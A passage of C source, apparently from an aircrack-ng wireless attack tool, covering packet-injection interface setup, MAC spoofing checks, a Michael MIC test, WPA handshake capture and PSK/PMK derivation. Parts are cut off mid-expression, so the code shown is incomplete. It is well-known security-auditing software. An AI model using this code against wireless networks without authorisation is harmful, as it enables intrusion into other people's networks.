defined(__i386__) #if defined(linux) if( ( dev.fd_rtc = open( "/dev/rtc0", O_RDONLY ) ) < 0 ) { dev.fd_rtc = 0; } if( (dev.fd_rtc == 0) && ( ( dev.fd_rtc = open( "/dev/rtc", O_RDONLY ) ) < 0 ) ) { dev.fd_rtc = 0;

} if(dev.fd_rtc > 0) { if( ioctl( dev.fd_rtc, RTC_IRQP_SET, RTC_RESOLUTION ) < 0 ) { perror( "ioctl(RTC_IRQP_SET) failed" ); printf( "Make sure enhanced rtc device support is enabled in the kernel (module\n" "rtc, not genrtc) - also try 'echo 1024 >/proc/sys/dev/rtc/max-user-freq'.\n" ); close( dev.fd_rtc ); dev.fd_rtc = -1; } else { if( ioctl( dev.fd_rtc, RTC_PIE_ON, 0 ) < 0 ) { perror( "ioctl(RTC_PIE_ON) failed" ); close( dev.fd_rtc ); dev.fd_rtc = -1; } } } else { printf( "For information, no action required:" " Using gettimeofday() instead of /dev/rtc\n" ); dev.fd_rtc = -1; } #endif /* linux */ #endif /* i386 */ opt.iface_out = argv[optind]; opt.port_out = get_ip_port(opt.iface_out, opt.ip_out, sizeof(opt.ip_out)-1); //don't open interface(s) when using test mode and airserv if( ! (opt.a_mode == 9 && opt.port_out >= 0 ) ) { /* open the replay interface */ _wi_out = wi_open(opt.iface_out); if (!_wi_out) return 1; dev.fd_out = wi_fd(_wi_out); /* open the packet source */ if( opt.s_face != NULL ) { //don't open interface(s) when using test mode and airserv if( ! (opt.a_mode == 9 && opt.port_in >= 0 ) ) { _wi_in = wi_open(opt.s_face); if (!_wi_in) return 1; dev.fd_in = wi_fd(_wi_in); wi_get_mac(_wi_in, dev.mac_in); } } else { _wi_in = _wi_out;

dev.fd_in = dev.fd_out; /* XXX */ dev.arptype_in = dev.arptype_out; wi_get_mac(_wi_in, dev.mac_in); } wi_get_mac(_wi_out, dev.mac_out); } /* drop privileges */ setuid( getuid() ); /* XXX */ if( opt.r_nbpps == 0 ) { opt.r_nbpps = 10; } if( opt.s_file != NULL ) { if( ! ( dev.f_cap_in = fopen( opt.s_file, "rb" ) ) ) { perror( "open failed" ); return( 1 ); } n = sizeof( struct pcap_file_header ); if( fread( &dev.pfh_in, 1, n, dev.f_cap_in ) != (size_t) n ) { perror( "fread(pcap file header) failed" ); return( 1 ); } if( dev.pfh_in.magic != TCPDUMP_MAGIC && dev.pfh_in.magic != TCPDUMP_CIGAM ) { fprintf( stderr, "\"%s\" isn't a pcap file (expected " "TCPDUMP_MAGIC).\n", opt.s_file ); return( 1 ); } if( dev.pfh_in.magic == TCPDUMP_CIGAM ) SWAP32(dev.pfh_in.linktype); if( dev.pfh_in.linktype != LINKTYPE_IEEE802_11 && dev.pfh_in.linktype != LINKTYPE_PRISM_HEADER ) { fprintf( stderr, "Wrong linktype from pcap file header " "(expected LINKTYPE_IEEE802_11) -\n" "this doesn't look like a regular 802.11 " "capture.\n" ); return( 1 ); } } //if there is no -h given, use default hardware mac if( maccmp( opt.r_smac, NULL_MAC) == 0 )

{ memcpy( opt.r_smac, dev.mac_out, 6); if(opt.a_mode != 0 && opt.a_mode != 4 && opt.a_mode != 9) { printf("No source MAC (-h) specified. Using the device MAC (%02X:%02 X:%02X:%02X:%02X:%02X)\n", dev.mac_out[0], dev.mac_out[1], dev.mac_out[2], dev.mac_out[ 3], dev.mac_out[4], dev.mac_out[5]); } } if( maccmp( opt.r_smac, dev.mac_out) != 0 && maccmp( opt.r_smac, NULL_MAC) ! = 0) { // if( dev.is_madwifi && opt.a_mode == 5 ) printf("For --fragment to work on madwifi[-ng], set the interface MAC according to (-h)!\n"); fprintf( stderr, "The interface MAC (%02X:%02X:%02X:%02X:%02X:%02X)" " doesn't match the specified MAC (-h).\n" "\tifconfig %s hw ether %02X:%02X:%02X:%02X:%02X:%02X\n", dev.mac_out[0], dev.mac_out[1], dev.mac_out[2], dev.mac_out[3], dev.mac_out[4], dev.mac_out[5], opt.iface_out, opt.r_smac[0], opt.r_smac[1], opt.r_smac[2], opt .r_smac[3], opt.r_smac[4], opt.r_smac[5] ); } /* DO MICHAEL TEST */ bzero(buf, 128); memcpy(buf, "M", 1); i = michael_test((unsigned char*)"\x82\x92\x5c\x1c\xa1\xd1\x30\xb8", (unsign ed char*)buf, strlen(buf), (unsigned char*)"\x43\x47\x21\xca\x40\x63\x9b\x3f"); PCT; printf("Michael Test: %s\n", i ? "Successful" : "Failed"); /* END MICHAEL TEST*/ if(getnet(NULL, 0, 0) != 0) return 1; PCT; printf("Found specified AP\n"); got_hdsk=0; while(1) { getHDSK(); for(i=0; i 1) { calc_pmk(opt.psk, opt.r_essid, opt.pmk);

PCT; printf("PSK: %s\n", opt.psk); PCT; printf("PMK: "); for(i=0; i